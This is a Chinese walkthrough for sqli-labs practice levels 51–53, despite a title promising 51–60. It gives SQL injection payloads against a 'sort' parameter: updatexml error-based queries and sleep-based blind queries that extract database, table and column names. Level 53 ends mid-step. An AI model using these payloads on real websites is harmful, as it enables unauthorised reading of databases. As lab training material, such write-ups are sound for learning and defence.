sqli-labs靶场通关攻略（51-60）

本文主要是介绍sqli-labs靶场通关攻略（51-60），希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

Less-51

1、判断闭合方式

输入?sort=1' --+  页面闭合成功
  2、查询数据库

输入?sort=-1' and updatexml(1,concat(1,database()),1) --+

3、查询数据库中的表

输入?sort=-1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security' )),1) --+

4、查询users表中的列

输入?sort=-1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+

Less-52

1、判断闭合方式

输入?sort=1 --+ ,页面闭合成功

2、查询数据库长度

输入?sort=1 and if(length(database())>7,sleep(3),1) --+  页面延时三秒

输入?sort=1 and if(length(database())>8,sleep(3),1) --+ 页面回显正常

得出数据库长度为8

3、查询数据库名

输入?sort=1 and if((ascii(substr(database(),1,1))>114),sleep(3),1)，页面延时三秒

输入?sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1) 页面回显正常

得出第一位字符的ASCII值为115，结合ASCII表得出的一个字符为‘s’

再依次类推得出数据库名为‘security’

4、查询数据库中的表

输入?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)  页面延时三秒

输入?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)    页面回显正常

得出表的第一个字符的ascii值为101，结合ASCII表得出第一个字符为‘e’

再依次类推，得出第一个数据库为‘email’

Less-53

1、判断闭合方式

输入?sort=1' --+  页面闭合成功

2、查询数据库名

输入?sort=1' and if((ascii(substr(database(),1,1))>114),sleep(3),1)--+

 页面延时三秒

输入?sort=1' and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+

 页面正常回显

说明第一个字符大于114不大于115 即第一位字符ascii码等于115

结合ASCII表得出的一个字符为‘s’

再依次类推，得出数据库名为‘security’

3、查询数据库中的表

输入?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)--+ 

页面延时三秒

这篇关于sqli-labs靶场通关攻略（51-60）的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---